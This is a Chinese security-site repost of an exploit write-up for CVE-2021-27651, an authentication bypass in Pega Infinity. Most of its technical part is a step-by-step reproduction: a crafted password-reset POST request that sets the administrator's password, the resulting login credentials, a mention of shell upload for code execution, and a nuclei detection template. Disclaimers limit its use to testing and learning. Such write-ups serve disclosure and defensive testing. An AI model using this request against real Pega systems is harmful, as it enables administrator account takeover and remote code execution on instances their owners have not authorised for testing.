Pega Infinity - 绕过身份验证[CVE-2021-27651]

admin
admin
admin
139329
文章
114
评论
2025年4月24日15:32:08评论0 views字数 2398阅读7分59秒阅读模式
Pega Infinity - 绕过身份验证[CVE-2021-27651]
Pega Infinity - 绕过身份验证[CVE-2021-27651]

CVE-2021-27651

Pega Infinity - 绕过身份验证[CVE-2021-27651]
免责声明

我们发布的内容仅作为测试和学习交流,禁止用于未授权场景。任何人不得将其用于非法目的。我方对于阅读本文技术引起的法律责任概不负责。

--->漏洞描述

Pega Infinity 版本8.2.1到8.5.2包含身份验证绕过漏洞,因为本地账户的密码重置功能可用于绕过本地身份验证检查。

漏洞概述

漏洞名称

Pega Infinity - 绕过身份验证

漏洞编号

CVE-2021-27651

公开时间

 2021

漏洞等级

严重

评分

9.8

POC是否公开

EXP是否公开

--->影响版本

Pega Infinity >= 8.2.1 Pega Infinity <= 8.5.2

--->漏洞详情

An attacker can bypass all stages of the password reset flow and reset any user's account on Pega infinity. This is done by (1) initiating the password reset flow and typing in the victim email, then (2) forcing the HTTP POST request to update the password through. An attacker could login using the newly edited account and fully compromise the Pega instance via the many acceptable post-auth code execution vectors (modifying dynamic pages, templating, etc.)
--->漏洞复现

1. Browse to the login page of any Pega instance

2. Click "reset password"

3. Type in "administrator@pega.com", proxy the HTTP request, send the HTTP request with the "[email protected]" to the Burp repeater tab or any similar tab, then allow the request to go through by disabling the proxy or clicking "send"

4. After allowing the initial request to go through, modify the HTTP requests body in the repeater so it includes the following data...

POST /prweb/PRServlet/app/default/:PEGA_ID*/!STANDARD HTTP/1.1 (:PEGA_ID is a unique ID for each site, it is in this format: ZOgwf2Zk3OsEg_oG74MXXxG2bXKbv56W)Host: redacted.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 112Origin: https://redacted.comDNT1Connection: closeReferer: https://redacted.com/prweb/PRServlet/app/default/:PEGA_ID*/!STANDARDCookie: yourCookieUpgrade-Insecure-Requests: 1pzAuth=guest&NewPassword=Rules%401234&ConfPassword=Rules%401234&pyActivity%3DCode-Security.pzChangeUserPassword=
5. Login using the following credentials after sending the HTTP request, having bypassed the confirmation part of reset password and being able to login to the administrator account...
[email protected] / Rules@1234
Pega Infinity - 绕过身份验证[CVE-2021-27651]
Password bypass
Remote code execution via shell upload
Pega Infinity - 绕过身份验证[CVE-2021-27651]
--->POC
id: pegainfo:  name: Pega Infinity Login  author: sshell  severity: lowrequests:  - method: GET    path:      - "{{BaseURL}}/prweb/PRRestService/unauthenticatedAPI/v1/docs"    headers:      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55    matchers:      - type: word        words:          - "Pega API"
--->Exploit Video

原文始发于微信公众号(偏远酒馆):Pega Infinity - 绕过身份验证[CVE-2021-27651]

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年4月24日15:32:08
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Pega Infinity - 绕过身份验证[CVE-2021-27651]https://cn-sec.com/archives/3994661.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息